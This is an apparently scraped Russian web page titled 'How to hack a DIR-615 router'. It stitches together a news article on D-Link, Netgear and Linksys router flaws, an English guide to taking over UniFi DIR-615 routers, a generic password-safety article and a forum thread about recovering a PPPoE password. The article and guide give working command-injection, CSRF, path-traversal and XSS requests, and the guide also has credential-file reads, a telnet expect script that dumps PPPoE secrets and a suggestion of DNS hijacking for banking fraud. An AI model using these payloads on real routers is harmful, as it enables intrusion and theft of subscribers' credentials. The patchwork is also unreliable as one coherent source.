Как взломать роутер dir 615

Очередные уязвимости нулевого дня в различных роутерах

Время на прочтение
7 мин

Количество просмотров 55K

Похоже, начало года не задалось для производителей роутеров. Буквально сегодня я сообщал о критических уязвимостях в роутерах различных производителей, связанных с небезопасной обработкой протокола UPnP. И вот ещё одна новость на эту же тему. На сей раз уязвимости совершенно разные. Затронуто оборудование:

  • D-Link DIR-615, DIR-600 и DIR-300 (rev B)
  • Netgear DGN1000B
  • Cisco Linksys E1500/E2500
  • Netgear SPH200D

Уязвимости довольно различны, но их объединяет несколько фактов: один автор и нежелание вендора выпускать патч (если верить автору).

D’Link DIR-615

Утверждается что проблема в ревизии H1, прошивки версии 8.04 от 4 сентября 2012 и 8.04 от 18 января 2013. Правда, я не смог найти эти версии на официальном сайте вендора.

Выполнение произвольных команд ОС роутера

Авторизованный пользователь может выполнить произвольную команду на устройстве, отправив GET-запрос, в котором команды будут переданы в параметре

ping_ipaddr

Пример:

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr=

ответ на команду приходит в теле HTTP-ответа:

HTTP/1.0 200 OK
Pragma: no-cache
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript" src="common.js.htm"></script>
<script language="javascript">
CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS});
var pingResult="Domain";
var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<==
var vctinfo= [
{ethport:'0', status:'0', rate:'0', dup:'0'},
{ethport:'1', status:'0', rate:'0', dup:'0'},
{ethport:'2', status:'0', rate:'0', dup:'0'},

Может, кто спросит: «В чём же уязвимость, если авторизованному пользователю только это возможно»? Объясню: злоумышленник может воспользоваться социальной инженерией и кинуть владельцу роутера специально сформированную ссылку.

Раскрытие информации

GET-запрос на адрес вида

http://IP_роутера/gconfig.htm

вернёт нам:

var ModelName = 'DIR-615'; var systemName='DLINK-DIR615'; var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0} 

Изменение пароля без ввода старого

Достаточно послать GET-запрос с таким содержимым:

http://IP_роутера/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615

Представители D-Link были оповещены о проблемах в безопасности, но заявили, что фикса не будет, т.к. по их мнению, это проблема не в их оборудовании, а в браузерах и самих пользователях их устройств.

DIR-600 / DIR 300 — HW rev B1

DIR-300 — уязвимы версии:

  • 2.12 от 18.01.2012
  • 2.13 от 07.11.2012

DIR-600 — уязвимы версии:

  • 2.12b02 от 17/01/2012
  • 2.13b01 от 07/11/2012
  • 2.14b01 от 22/01/2013
Выполнение произвольных команд ОС роутера

Не авторизованный пользователь может выполнить произвольную команду на устройстве, отправив GET-запрос, в котором команды будут переданы в параметре

cmdПример — запуск сервера telnetd

Request:
POST /command.php HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.178.222/
Content-Length: 15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

cmd=telnetd;

Небезопасное хранение чувствительной информации

Пароли на устройстве хранятся в открытом виде, без хеширования:

# cat var/passwd
"admin" "test" "0"

Просмотреть текущий пароль пользователя возможно вот так:

root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
"admin" "THESECRETPASS" "0"
Раскрытие информации

Запрос вида:

http://Target-IP/DevInfo.txt

вернёт нам:

HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267

Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: <snip>
WAN MAC: <snip>
WLAN MAC: <snip>

Представители D-Link были оповещены о проблемах в безопасности, но заявили, что фикса не будет, т.к. по их мнению, это проблема не в их оборудовании, а в браузерах и самих пользователях их устройств.

Netgear SPH200D

Уязвимые версии прошивок:

Firmware Version: 1.0.4.80
Kernel Version: 4.1-18
Web Server Version: 1.5

Чтение файлов на устройстве

Авторизованный пользователь может читать файлы на устройстве

http://IP_роутера/../../etc/passwd

вернёт ответ вида:

HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

root:x:0:0:root:/root:/bin/bash
demo:x:5000:100:Demo User:/home/demo:/bin/bash
nobody:x:65534:65534:Nobody:/htdocs:/bin/bash

аналогично происходит чтение каталогов:

/../../var/

HTTP/1.0 200 OK
Content-type: text/html
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

<H1>Index of ../../var/</H1>

<p><a href="/../../var/.">.</a></p>
<p><a href="/../../var/..">..</a></p>
<p><a href="/../../var/.Skype">.Skype</a></p>
<p><a href="/../../var/jffs2">jffs2</a></p>
<p><a href="/../../var/htdocs">htdocs</a></p>
<p><a href="/../../var/cnxt">cnxt</a></p>
<p><a href="/../../var/ppp">ppp</a></p>
<p><a href="/../../var/conf">conf</a></p>
<p><a href="/../../var/bin">bin</a></p>
<p><a href="/../../var/usr">usr</a></p>
<p><a href="/../../var/tmp">tmp</a></p>

Но т.к. необходимо быть авторизованным на устройстве и необходимо получить ответ на запрос — не совсем ясно каким образом злоумышленник может этим воспользоваться

Межсайтовый скриптинг

image

Наличие «заводского» аккаунта

По-умолчанию, на устройстве существует аккаунт с логином: паролем service:service. Я так понимаю нет возможности его поменять предоставляемыми штатными средствами.

Производитель был уведомлён о проблемах безопасности в августе 2012, но не отреагировал.

Linksys E1500/E2500

Уязвимые версии прошивок:
e1500:

  • v1.0.00 — build 9 -февраль 17, 2011
  • v1.0.04 — build 2 — март 8, 2012
  • v1.0.05 — build 1 — август 23, 2012

e2500

  • v1.0.03
Выполнение произвольных команд ОС роутера

Авторизованный пользователь может выполнить произвольную команду на устройстве, отправив GET-запрос, в котором команды будут переданы в параметре

ping_size

Пример:

http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
Раскрытие директорий

Пример:

POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version

Придёт ответ вида:

HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
Изменение пароля без ввода старого

Авторизованный пользователь может поменять пароль, отправив специально сформированный POST-запрос на устройство:

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/Management.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 
CSRF-атака для смены пароля:
http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
Межсайтовый скриптинг
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

Редирект на другой сайт

POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 290

submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

Ссылки на первоисточник:

  1. Multiple Vulnerabilities in D’Link DIR-600 and DIR-300 (rev B)
  2. Multiple Vulnerabilities in D’Link DIR-615
  3. Multiple Vulnerabilities in Netgear SPH200D [Update: 03.02.2013]
  4. Multiple Vulnerabilities in Linksys E1500/E2500

UniFI-Dlink-DIR-615

Search for the Unifi Dlink DIR-615 router’s Server details = Mathopd/1.5p6 country:MY
The country filter is only for registered user so make sure you have been registered

Image 1

Choose any router you want

To get the user’s creds, enter the following appendage = model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

Image 2

and poof !

Image 3

As you can see, TM’s operator add another hidden account under different name from the previous version
The good news is every D-Link router with copyright 2011 and above is using the same username and password as above while the D-Link router with the copyright 2010 and below is using username operator with different password.
So you guys need to enumerate the creds for every each routers or you can just include the chap-secrets file in the url instead of getting the httpassword first (/etc/ppp/chap-secrets).

Leveraging the Attack

Actually the main reason for me to include /etc/ppp/httpassword is to let advanced attacker to make use of those credentials. For example, by changing the router’s DNS server and set up a malicious DNS server with fake pages. This could lead to more dangerous risks such as online banking fraud, CSRF, and etc.

Image 4

Getting PPPoE username and password

Image 4

Go to the Maintenance tab and enable the Remote Telnet from WAN, then save the settings
No reboot required

Open up a terminal and just telnet to the IP

telnet <ip> <port>
cat /etc/ppp/chap-secrets

And tadaa ! there you go the username and password

To automate the telnet part, use this simple script

#!/usr/bin/expect
set timeout 20
set ip [lindex $argv 0]
spawn telnet $ip 23
expect "login: "
send "Management\n"
expect "Password: "
send "TestingR2\n"
expect "# "
send "cat /etc/ppp/chap-secrets\n"
send "exit\n"
interact

Usage: ./unifi-pppoe-creds

Credits goes to: link 1 and link 2

Роутер DIR 615 является одним из самых популярных и широко используемых устройств для создания Wi-Fi сети дома или в офисе. Однако не мало раз возникает ситуация, когда пользователь забывает или теряет пароль от этого устройства. В таких случаях необходимо знать, как найти, изменить и восстановить пароли для роутера DIR 615.

По умолчанию, DIR 615 поставляется с установленным паролем, который обеспечивает безопасность ваших данных и предотвращает несанкционированный доступ к сети. Однако, если вы забыли этот пароль, или хотите изменить его для повышения безопасности, необходимо выполнить несколько простых шагов.

В этой статье мы расскажем вам о нескольких способах нахождения, изменения и восстановления паролей для роутера DIR 615. Мы рассмотрим как стандартные методы, так и методы, которые помогут вам в случае утери пароля или взлома вашей сети.

Также мы дадим вам полезные советы о том, как создать надежный пароль и как регулярно его менять, чтобы защитить свою сеть от несанкционированного доступа. И помимо этого, мы расскажем о том, как настроить защиту роутера DIR 615 от взлома и как сохранить безопасность вашей сети.

Содержание

  1. Найдите пароль для роутера DIR 615 в документации
  2. Как изменить пароль для роутера DIR 615 через веб-интерфейс
  3. Шаги по восстановлению пароля для роутера DIR 615 при его потере
  4. Опасности использования слабых паролей для роутера DIR 615
  5. Улучшение безопасности: как выбрать надежный и сложный пароль для роутера DIR 615

Найдите пароль для роутера DIR 615 в документации

Пароль для роутера DIR 615 можно найти в документации, которая поставляется вместе с устройством. Документация обычно содержит подробные инструкции по настройке роутера, включая информацию о пароле.

Чтобы найти пароль в документации, следуйте инструкциям ниже:

Шаг 1: Найдите руководство пользователя, поставляемое с роутером DIR 615. Обычно оно находится в коробке вместе с самим устройством. Если у вас нет физической копии, можно попробовать найти электронную версию на официальном сайте производителя.
Шаг 2: Откройте руководство пользователя и найдите раздел о настройке Wi-Fi и пароле.
Шаг 3: В этом разделе вы должны найти информацию о пароле для доступа к настройкам роутера. Обычно пароль указан рядом с полем «пароль» или «администратор». Этот пароль позволит вам войти в панель управления роутером и изменить настройки по своему усмотрению.
Шаг 4: Запишите пароль, чтобы иметь к нему доступ в будущем. Рекомендуется выбрать сложный пароль, состоящий из букв, цифр и специальных символов, чтобы обеспечить безопасность сети.

Если у вас возникли проблемы с поиском пароля в документации, обратитесь к службе поддержки производителя или посетите форумы, где пользователи роутера DIR 615 обсуждают подобные вопросы. Там вы можете найти ответы на свои вопросы и получить помощь.

Как изменить пароль для роутера DIR 615 через веб-интерфейс

Для изменения пароля для роутера DIR 615 через веб-интерфейс, следуйте инструкциям ниже:

  1. Откройте веб-браузер на компьютере и введите адрес IP роутера DIR 615 в адресной строке. По умолчанию, адрес IP роутера DIR 615 — 192.168.0.1.
  2. Нажмите клавишу Enter на клавиатуре или нажмите кнопку перехода.
  3. В открывшемся окне авторизации введите имя пользователя и пароль, чтобы войти в веб-интерфейс роутера DIR 615. По умолчанию, имя пользователя — admin, пароль — пустое поле. Если вы ранее меняли пароль, введите свои данные.
  4. Найдите и выберите вкладку «Настройки» или «Settings» в меню роутера DIR 615.
  5. В меню «Настройки» найдите раздел «Безопасность» или «Security».
  6. В разделе «Безопасность» найдите опцию «Изменить пароль» или «Change Password».
  7. Введите новый пароль в соответствующие поля. Рекомендуется использовать пароль, состоящий из букв (верхнего и нижнего регистра), цифр и специальных символов, а также иметь длину не менее 8 символов.
  8. Подтвердите новый пароль, введя его еще раз в поле «Подтвердить пароль» или «Confirm Password».
  9. Нажмите кнопку «Сохранить» или «Save», чтобы применить новые настройки и изменить пароль для роутера DIR 615.

После успешного изменения пароля, вам будет необходимо использовать новый пароль при доступе к веб-интерфейсу роутера DIR 615.

Шаги по восстановлению пароля для роутера DIR 615 при его потере

В случае, если вы забыли пароль от своего роутера DIR 615 или у вас потерялась настройка по умолчанию, существуют определенные шаги, которые вы можете предпринять для восстановления пароля:

Шаг 1:

Найдите кнопку сброса на задней панели роутера. Обычно она расположена рядом с портами Ethernet.

Шаг 2:

Используйте острую тонкую иглу или зубочистку, чтобы нажать и удерживать кнопку сброса в течение 10-15 секунд. Это сбросит настройки роутера к заводским установкам.

Шаг 3:

Подключитесь к роутеру с помощью компьютера или ноутбука, используя Ethernet-кабель.

Шаг 4:

Введите «192.168.0.1» или «192.168.1.1» в адресной строке браузера и нажмите Enter. Это откроет веб-интерфейс роутера.

Шаг 5:

Войдите в систему, используя стандартные учетные данные для DIR 615. Обычно логин и пароль по умолчанию — «admin».

Шаг 6:

После успешного входа в систему, вы сможете изменить пароль роутера на свой собственный.

Опасности использования слабых паролей для роутера DIR 615

Одной из наиболее серьезных угроз является возможность несанкционированного доступа к вашей домашней сети. Если злоумышленник получит доступ к вашему роутеру, он сможет контролировать весь интернет-трафик, перехватывать личные данные и пароли к другим онлайн-сервисам, а также внедрять вредоносные программы и вирусы на все подключенные устройства.

Кроме того, слабый пароль делает вашу домашнюю сеть уязвимой для таких атак, как перебор паролей. Существуют специальные программы, которые автоматически генерируют и проверяют множество возможных паролей, пытаясь их угадать. Если ваш пароль состоит из простых слов, чисел или шаблонных комбинаций, он может быть легко подобран такими программами.

Для защиты вашей домашней сети и предотвращения несанкционированного доступа к роутеру DIR 615, рекомендуется использовать пароль, который содержит шесть или более символов, включает в себя комбинацию прописных и строчных букв, цифр и специальных символов. Также рекомендуется регулярно менять пароль и не использовать одинаковые пароли для разных устройств.

Улучшение безопасности: как выбрать надежный и сложный пароль для роутера DIR 615

При выборе пароля для роутера DIR 615 важно учесть несколько ключевых принципов безопасности:

Длина пароля: Чем длиннее пароль, тем сложнее его подобрать методом перебора. Рекомендуется использовать пароль длиной не менее 8 символов.
Сочетание символов: Используйте комбинацию заглавных и строчных букв, цифр и специальных символов для создания сложного пароля.
Избегайте личной информации: Не используйте имя, дату рождения или другую личную информацию в качестве пароля. Такие данные могут быть легко угаданы.
Регулярное изменение пароля: Чтобы обеспечить безопасность вашей сети, рекомендуется регулярно изменять пароль роутера DIR 615.
Хранение пароля: Не храните пароль в открытом виде. Вместо этого запишите его в надежное место или используйте парольный менеджер.

Выбор надежного и сложного пароля для роутера DIR 615 поможет защитить вашу домашнюю сеть от несанкционированного доступа. Следуя приведенным выше рекомендациям, вы сможете создать пароль, который будет сложным для угадывания, даже при использовании специальных программ для взлома паролей.

Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя

 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Получить забытый пароль PPPoE

Доброго времени суток.
Проблема возникла, есть WiFi-роутер, который подключается к интернет через PPPoE. Есть доступ к роутеру через WiFi (логин/пароль от веб-интерфейса, WPA ключ, т.е. полный доступ ко всему и вся). Физического доступа к роутеру нет (и не будет), но тем не менее он стабильно поддерживает соединение без обслуживания. Возникло желание обновить прошивку (т.к. есть необходимость в шейпере, скорее-всего в обновлённой прошивке он присутствует). Роутер DLink DIR-615 С2 с заводской прошивкой 3.02RU. Но боюсь, что после обновления прошивки могут восстановиться заводские установки, а PPPoE пароля я не знаю. Логин не скрыт, однако пароль получить через WEB-интерфейс не удаётся. Раскрытие «звёздочек» в текстовом поле невозможно, браузеру пароль вообще не передаётся.
Какие ещё могут быть варианты? Допустим я могу задампить данные роутера, затем попробовать разобраться в структуре (скорее всего это почти нереально), даст ли это что-либо или это пустая трата времени?
Обратиться в техническую поддержку тоже не выйдет, к сожалению.

Follow the white rabbit.


Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя

 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Re: Получить забытый пароль PPPoE

Сообщение Proxy » 04.12.2011 (Вс) 20:27

Урра, получилось :D Собственно вот рецепт:
1 — Заходим через Web-интерфейс на роутер (предполагается, что роутер ваш, либо по какой-то иной причине вы располагаете паролем от него; в общем это не инструкция «как достать соседа»)
2 — Заходим в Tools — System — System Settings, нажимаем Save To Local Hard Drive
3 — Полученный файлик открываем чем-либо, находим в файле «.wan_pppoe_password_00:». Далее до следующего вхождения точки следует пароль. Он не зашифрован ни разу, вот так и хранится в открытом виде.
4 — Чтобы не рисковать и проверить корректность полученного пароля заходим на сайт провайдера. Чтобы узнать к какому провайдеру наш роутер подключен заходим на 2IP.ru (или что-то аналогичное). Возможно там вы увидите, что имя провайдера не установлено, но тогда обратите внимание на «Имя вашего компьютера», тут-то и получаем URL офсайта провайдера.
И вот тут уже заходим в личный кабинет. Зашли, убедились что пароль верный (обычно он один и для PPPoE и для личного кабинета) — теперь самое время обновлять прошивку без риска потерять логин/пасс PPPoE.

ЗЫ. не пытайтесь убрать звёздочки — роутер не передаёт пароль браузеру, вместо этого имеем произвольный набор символов сопоставимой длины.

Follow the white rabbit.


alibek
Большой Человек
Большой Человек
 
Сообщения: 14205
Зарегистрирован: 19.04.2002 (Пт) 11:40
Откуда: Russia

Re: Получить забытый пароль PPPoE

Сообщение alibek » 05.12.2011 (Пн) 16:43

Если физического доступа к роутеру нет, то после перепрошивки он может перестать быть доступным.
На роутерах часто запрещено администрирование с WLAN.

Lasciate ogni speranza, voi ch’entrate.


iGrok
Артефакт VBStreets
Артефакт VBStreets
 
Сообщения: 4272
Зарегистрирован: 10.05.2007 (Чт) 16:11
Откуда: Сетевое сознание

Re: Получить забытый пароль PPPoE

Сообщение iGrok » 05.12.2011 (Пн) 17:05

Мало того, почти гарантированно сбросятся ВСЕ настройки, включая ssid, айпишники, и т.п.

label:

cli

jmp label


Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя

 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Re: Получить забытый пароль PPPoE

Сообщение Proxy » 05.12.2011 (Пн) 17:56

alibek писал(а):На роутерах часто запрещено администрирование с WLAN

У меня из 2-х DLink`ов только на одном WiFi был выключен по умолчанию (емнип на Dir-320). Т.е. после сброса можно обнаружить сеть с SSID «DLink» и войти на роутер под admin с пустым паролем (собственно об этом имеется и предупреждение на главной странице, если пароль отсутствует и ссылка на страницу администрирования учёток; т.е. кто первый пришёл — тот и хозяин). В остальном для WiFi ограничена только возможность доступа через telnet (вчера у меня была мысль забрутить роутер через telnet в обход капчи, но telnet доступ есть только у хоста, подключенного через Ethernet, притом только через Wan либо 1 порт; потом проверил пустой пароль и успешно вошёл).

Мало того, почти гарантированно сбросятся ВСЕ настройки, включая ssid, айпишники, и т.п.

Главное чтобы сохранился доступ через WiFi к админке, остальное побоку, конфиги у меня все уже есть.
На моих галочка есть, позволяющая по возможности сохранить конфиги (естественно если будут несовместимы, то сбросится, не знаю как оно на валидность проверяет, не вникал). На этой железке нету.
И я кстати всё же решил вопрос без прошивки. Просто убедился, что канал почти 100% времени свободен, стало быть и шейпить не к чему, торрентами тут похоже никто не балуется (особенно если посмотреть на изначально пустую таблицу форвардинга), а значит никто никому мешать не будет.

Follow the white rabbit.


alibek
Большой Человек
Большой Человек
 
Сообщения: 14205
Зарегистрирован: 19.04.2002 (Пт) 11:40
Откуда: Russia

Re: Получить забытый пароль PPPoE

Сообщение alibek » 05.12.2011 (Пн) 19:30

Proxy писал(а):но telnet доступ есть только у хоста, подключенного через Ethernet, притом только через Wan либо 1 порт; потом проверил пустой пароль и успешно вошёл).

Честно говоря, ни разу не видел роутера, у которого был бы разрешен доступ telnet через по WAN.

Lasciate ogni speranza, voi ch’entrate.


Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя

 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Re: Получить забытый пароль PPPoE

Сообщение Proxy » 05.12.2011 (Пн) 19:47

alibek писал(а):Честно говоря, ни разу не видел роутера, у которого был бы разрешен доступ telnet через по WAN.

Например DIR-300 иного не приемлет, если через веб-интерфейс telnet не включить.


1. Cтавим на компе IP 192.168.20.80/mask 255.255.255.0
2. Втыкаем кабель в WAN порт (!) (INTERNET на нем написано)
2.1 Зажимаем кнопку «RESET»

Имеется ввиду нестандартное использование WAN порта, не как для доступа к telnet из внешки (принимает только во время начальной загрузки и принимает только с одного фиксированного IP). К тому же на DLink`ах (и не только, ибо конструктивно они все имеют абсолютных близнецов и у других производителей) WAN порт в режиме репиттера, WiFi клиента или бриджа можно использовать (опционально) как 5-й порт встроенного свитча.

ЗЫ. С другой стороны — это хорошо. Это даёт возможность забрутить роутер невзирая на капчу в web-интерфейсе (и отсутствие физического доступа к нему :D ). Достаточно получить доступ к кабелю или к управляемому свитчу в щитке-этажнике (если таковой имеется, вообще довольно часто у того же эр-телеком сеть именно так и была построена) и перезагрузить роутер (допустим временным выключением реле-автомата в щитке (а если запараллелить с резистором перед отключением, то «отключение» ощутит в первую очередь оборудование типа роутера, но не ощутит освещение, холодильник и т.п. нечувствительное к падению напряжения оборудование) в подъезде или попробовав определить реакцию роутера на ddos, например у того же dd-wrt есть возможность Keep Alive, где есть плановая перезагрузка + перезагрузка по потере пинга с указанным хостом, что для ddos самое то). Далее создать хост с IP 192.168.20.80 и забрутить роутер через telnet. Это всё на уровне фантастики, конечно.

Follow the white rabbit.


Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя

 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Re: Получить забытый пароль PPPoE

Сообщение Proxy » 05.01.2012 (Чт) 13:19

Забавную вещь обнаружил, на роутерах DLink для перезагрузки в самом деле не нужно знать логин/пароль администратора, достаточно без авторизации сразу обратиться к /reboot.cgi
Ну а что может дать умышленная перезагрузка я уже писал, т.е. это возможность прошить или сбросить роутер имея доступ только к WAN интерфейсу и ни к чему более. Не знаю для каких прошивок актуально, но для 3.02 на роутере DIR-615 С2 работает.

Follow the white rabbit.


1791988
Начинающий
Начинающий
 
Сообщения: 5
Зарегистрирован: 11.05.2012 (Пт) 23:10

Re: Получить забытый пароль PPPoE

Сообщение 1791988 » 11.05.2012 (Пт) 23:13

как из DIR-300 вытащить пароль PPPoE .. если смотреть HTML код страницы там параметр value тоже в звёздочках


Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя

 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Re: Получить забытый пароль PPPoE

Сообщение Proxy » 12.05.2012 (Сб) 8:33

Техническое обслуживание > Сохранение и восстановление > Сохранить настройки на локальный жесткий диск
Потом открываешь файл конфигурации любым текстовым редактором и ищешь значение параметра wan_pppoe_password_00, оно и есть пароль PPPoE

Follow the white rabbit.


1791988
Начинающий
Начинающий
 
Сообщения: 5
Зарегистрирован: 11.05.2012 (Пт) 23:10

Re: Получить забытый пароль PPPoE

Сообщение 1791988 » 12.05.2012 (Сб) 14:34

Проблема была в том что при открытии любым текстовым редактором конфигурационный файл всё отображалось каракулями.. Нашел специальную прогу которая эти конфиг файлы корректно открывает и всё видно … Вопрос теперь в другом … Как настроить Russian PPPoE на прошивке dd-wrt для DIR-300 т.к. на официальной постоянно глючит точка


alibek
Большой Человек
Большой Человек
 
Сообщения: 14205
Зарегистрирован: 19.04.2002 (Пт) 11:40
Откуда: Russia

Re: Получить забытый пароль PPPoE

Сообщение alibek » 12.05.2012 (Сб) 18:28

Использовать другую прошивку, DD-WRT не поддерживает Dual Access PPPoE (во всяком случае через GUI).

Lasciate ogni speranza, voi ch’entrate.


1791988
Начинающий
Начинающий
 
Сообщения: 5
Зарегистрирован: 11.05.2012 (Пт) 23:10

Re: Получить забытый пароль PPPoE

Сообщение 1791988 » 12.05.2012 (Сб) 18:29

alibek писал(а):Использовать другую прошивку, DD-WRT не поддерживает Dual Access PPPoE (во всяком случае через GUI).

Пишут что поддерживает только нужно скрипт прописать

Какую другую?


Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя

 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Re: Получить забытый пароль PPPoE

Сообщение Proxy » 12.05.2012 (Сб) 19:34

alibek писал(а):во всяком случае через GUI

Через GUI не поддерживает.
А вот готовый скрипт из сети.

1791988 писал(а):Какую другую?

300 довольно слабый, так что выбор прошивок не богат, большинство прошивок для старших серий DLink для Dir300 сборок не имеют.

Follow the white rabbit.


1791988
Начинающий
Начинающий
 
Сообщения: 5
Зарегистрирован: 11.05.2012 (Пт) 23:10

Re: Получить забытый пароль PPPoE

Сообщение 1791988 » 12.05.2012 (Сб) 19:53

Proxy писал(а):Через GUI не поддерживает.
А вот готовый скрипт из сети.

как узнать эти параметры ? если от провайдера известны только имя пользователя и пароль для PPPoE и DNS
Из статьи скопировано и этого как раз не знаю
Диапазон домашней локальной сети: 192.168.1.0/24
Диапазон локальной сети провайдера: 10.0.0.0/8
Интерфейс в маршрутизаторе для подключения локальной сети: vlan1
Интерфейс в маршрутизаторе для подключения интернета: ppp0


1791988
Начинающий
Начинающий
 
Сообщения: 5
Зарегистрирован: 11.05.2012 (Пт) 23:10

Re: Получить забытый пароль PPPoE

Сообщение 1791988 » 12.05.2012 (Сб) 21:56

Как через SSH или TelNet сбросить настройки на заводские т.к. IP админ панели не даёт?


alibek
Большой Человек
Большой Человек
 
